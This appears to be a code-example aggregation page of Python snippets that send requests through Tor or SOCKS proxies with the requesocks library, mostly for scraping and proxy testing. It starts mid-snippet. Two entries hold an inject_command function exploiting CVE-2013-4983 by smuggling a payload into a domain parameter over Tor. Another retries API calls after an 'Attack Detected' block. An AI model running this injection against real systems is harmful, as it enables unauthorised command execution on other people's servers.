				self.session.get('http://timeschedules.uchicago.edu/').text
			except:
				continue
			break
Exemplo n.º 43
0
def inject_command(ip, payload):
    """ Actually does the exploitation of CVE-2013-4983 to inject out payload """
    url = "https://%s/end-user/index.php?c=blocked&action=continue" % (ip)
    body = "url=aHR0cDovL3d3dy5leGFtcGxlLmNvbQ%3d%3d"
    body += "&args_reason=something_different_than_filetypewarn&filetype=dummy&user=buffalo"
    body += "&user_encoded=YnVmZmFsbw%3d%3d&domain=http%3a%2f%2fexample.com%3b"
    body += payload
    body += "&raw_category_id=one%7ctwo%7cthree%7cfour"
    session = requesocks.session()
    session.proxies = {"http": "socks5://127.0.0.1:9050", "https": "socks5://127.0.0.1:9050"}
    session.post(url, data=body, verify=False)
Exemplo n.º 44
0
    def whoami(self):
        """
        This is a check to make sure the proxy is working.
        """

        IPCHICKEN = "http://www.ipchicken.com"
        session = requesocks.session()
        session.proxies = self.session_proxies
        response = session.get(IPCHICKEN, headers=self.request_params)
        soup = BS(response.content, 'html.parser')
        return soup.find_all('p')[1].find('b').next.replace(' ', '').replace(
            '\n', '')
Exemplo n.º 45
0
def getip_requesocks(url):
    try:
        print "(+) Sending request with requesocks..."
        session = requesocks.session()
        session.proxies = {'http': 'socks5://127.0.0.1:9050',
        'https': 'socks5://127.0.0.1:9050'}
        r = session.get(url,timeout = 30)
        print "(+) tor_IP is: " + r.text.replace("\n", "")
        return  r.text.replace("\n", "")
    except Exception,e:
        print Exception,e
        return -1
def get_page(url):
    """
    Get the content of the url by using BeautifulSoup
    """
    try:
        session = requesocks.session()
        session.proxies = {'http': 'socks5://127.0.0.1:9050',
                           'https': 'socks5://127.0.0.1:9050'}
        response = session.get(url, timeout=5)
        return bs4.BeautifulSoup(response.text)
    except Exception, e:
        return get_page(url)
Exemplo n.º 47
0
def get(url):
    logging.info('GET: %s' % url)
    try:
        session = requesocks.session()
        session.proxies = {
            'http': 'socks5://localhost:9050',
            'https': 'socks5://localhost:9050',
        }
        r = session.get(url)
        return r.text
    except:
        return None
Exemplo n.º 48
0
def fetch_search_results( base_url, sub, query=None, minAsk=None, maxAsk=None, bedrooms=None):
    search_params = {
        key: val for key, val in locals().items() if val is not None
    }

    base = base_url + sub
    #resp = requests.get(base, params=search_params, timeout=3)
    reset_socks()
    session = requests.session()
    session.proxies = {'http': 'socks5://127.0.0.1:9050', 'https': 'socks5://127.0.0.1:9050'}
    resp = session.get(base,timeout=10)
    resp.raise_for_status()  # <- no-op if status==200
    return resp.content, resp.encoding
Exemplo n.º 49
0
def select_session(configs):

    if 'proxies' in configs:
        session = requesocks.session()
        proxy = configs['proxies'][0]
        session.proxies = {
            'http': 'socks4://%s:%d' % (proxy['address'], proxy['port']),
            'https': 'socks4://%s:%d' % (proxy['address'], proxy['port']),
        }
    else:
        session = requests.session()

    return session
Exemplo n.º 50
0
def select_session(configs):

    if 'proxies' in configs:
        session = requesocks.session()
        proxy = configs['proxies'][0]
        session.proxies = {
                'http': 'socks4://%s:%d' % (proxy['address'],proxy['port']),
                'https': 'socks4://%s:%d' % (proxy['address'],proxy['port']),
        }
    else:
        session = requests.session()

    return session
Exemplo n.º 51
0
def inject_command(ip, payload):
    """ Actually does the exploitation of CVE-2013-4983 to inject out payload """
    url = "https://%s/end-user/index.php?c=blocked&action=continue" % (ip)
    body = "url=aHR0cDovL3d3dy5leGFtcGxlLmNvbQ%3d%3d"
    body += "&args_reason=something_different_than_filetypewarn&filetype=dummy&user=buffalo"
    body += "&user_encoded=YnVmZmFsbw%3d%3d&domain=http%3a%2f%2fexample.com%3b"
    body += payload
    body += "&raw_category_id=one%7ctwo%7cthree%7cfour"
    session = requesocks.session()
    session.proxies = {
        'http': 'socks5://127.0.0.1:9050',
        'https': 'socks5://127.0.0.1:9050'
    }
    session.post(url, data=body, verify=False)
Exemplo n.º 52
0
def getip_requesocks(url):
    try:
        print "(+) Sending request with requesocks..."
        session = requesocks.session()
        session.proxies = {
            'http': 'socks5://127.0.0.1:9050',
            'https': 'socks5://127.0.0.1:9050'
        }
        r = session.get(url, timeout=30)
        print "(+) tor_IP is: " + r.text.replace("\n", "")
        return r.text.replace("\n", "")
    except Exception, e:
        print Exception, e
        return -1
Exemplo n.º 53
0
def get_page(url):
    """
    Get the content of the url by using BeautifulSoup
    """
    try:
        session = requesocks.session()
        session.proxies = {
            'http': 'socks5://127.0.0.1:9050',
            'https': 'socks5://127.0.0.1:9050'
        }
        response = session.get(url, timeout=5)
        return bs4.BeautifulSoup(response.text)
    except Exception, e:
        return get_page(url)
Exemplo n.º 54
0
 def get_pages(self, sleep_time, proxy=False):
     # have to run tor before the proxy option will work
     self.html_content[self.city_state] = []
     if proxy == True:
         session = requesocks.session()
         session.proxies = self.session_proxies
         for url in self.urls:
             time.sleep(sleep_time)
             response = session.get(url, headers=self.request_params)
             self.html_content[self.city_state].append(response.content)
     else:  # the default is no proxy
         for url in self.urls:
             time.sleep(sleep_time)
             response = requests.get(url, headers=self.request_params)
             self.html_content[self.city_state].append(response.content)
Exemplo n.º 55
0
def tor_request(url, num_iter=3):
    sessions = requesocks.session()
    sessions.proxies = {
        'http': 'socks5://localhost:9050',
        'https': 'socks5://localhost:9050'
    }
    try:
        with Controller.from_port(port=9051) as controller:
            controller.authenticate()
            for i in range(num_iter):
                s = sessions.get(BASE_URL)
                if s.status_code == 200:
                    _parse_and_print_response(s)
                controller.signal(Signal.NEWNYM)
                time.sleep(2)
                print("- refresh -")
    except SocketError, e:
        print(e, '\nPlease start Tor first.')
Exemplo n.º 56
0
def testSocks5(proxyHost, urlType):
    start_time = time.time()
    global timeoutTime
    #print "Testing socks proxy: http://"+proxyHost
    import socks
    import socket
    import urllib2
    hostNo = proxyHost.split(":")[0]
    portNo = proxyHost.split(":")[1]

    proxyTypeList = []
    proxyTypeList.append("socks5")

    for proxyType in proxyTypeList:
        session = requesocks.session()
        session.timeout = timeoutTime
        if proxyType == "socks5":
            if urlType == "https":
                urlPosition = urlList[0]
                session.proxies = {
                    'https': 'socks5://' + hostNo + ':' + portNo
                }
            else:
                urlPosition = urlList[1]
                session.proxies = {'http': 'socks5://' + hostNo + ':' + portNo}
        try:

            url = urlPosition[0]
            urlTitle = urlPosition[1]

            r = session.get(url)

            statusCode = str(r.status_code)

            if statusCode == "200":
                result = ((proxyHost, "", proxyType))
                resultList.append(result)
                if proxyType == "socks5":
                    end_time = time.time() - start_time
                    return proxyHost + "\tsocks5\t200\t" + str(end_time)
            else:
                return proxyHost + "\t" + proxyType + "\t" + statusCode
        except Exception as e:
            return proxyHost + "\t" + proxyType + "\t503"
Exemplo n.º 57
0
def Worker(task, useTOR=False):
	bytesRead=0
	httpCodes=[0]*5
	urlList=[]
	start=time()
	errors=0

	if useTOR:
		import requesocks
		session=requesocks.session()
		session.proxies={	"http" : 	"socks5://127.0.0.1:9050",
							"https" : 	"socks5://127.0.0.1:9050"}
	else:
		session=requests.Session()

	for t in task:
		urls=[]
		host=t[0]
		for path in t[1]:
			url="http://"+host+path
			try:
				if useTOR:
					r=session.get(url, timeout=3.0, prefetch=False, allow_redirects=True)
				else:
					r=session.get(url, timeout=3.0, stream=True, allow_redirects=True)
			except Exception as ex:
				errors+=1
				break

			httpCodes[(r.status_code/100)-1]+=1
			if r.status_code!=200 or not ValidResponse(r):
				errors+=1
				continue

			try:
				size, urls=ReadResponse(r, host)
			except:
				errors+=1
				continue
			bytesRead+=size
			urlList.extend(urls)

	return urlList, float("%.2f" % (time()-start)), bytesRead, errors, httpCodes, useTOR
Exemplo n.º 58
0
def realiza_peticion(key, id_candidato, tor=False, timeout=2):
    """Realiza una peticion a una de las apis. Devuelve la
    respuesta (json) como un diccionario"""
    payload = genera_mensaje(id_candidato)
    url = _dic_urls[key]
    kargs = {
        "data": json.dumps(payload),
        "headers": _headers,
        "timeout": timeout
    }
    while True:
        try:
            if tor is True:
                tor_req = req_socks.session()
                tor_req.proxies = _tor_proxies
                r = tor_req.post(url, **kargs)
            else:
                r = req.post(url, **kargs)
        except req.exceptions.Timeout:
            imprime("Timeout error")
            continue
        except req.exceptions.ConnectionError as error:
            errno = error.errno
            err_msg = "ConnectionError"
            if errno == 101:
                err_msg += (": Esta conectado a internet?")
            imprime(err_msg)
            time.sleep(0.5)
            continue
        except Exception as e:
            imprime("Excepcion: " + str(e))
            time.sleep(0.5)
            continue
        else:
            if r.text.find("Attack Detected") != -1:
                imprime(r.text)
                imprime("Ataque detectado!! A dormir")
                time.sleep(60)
                continue
            if hasattr(r, 'json'):
                return r.json()
            else:
                return json.loads(r.content)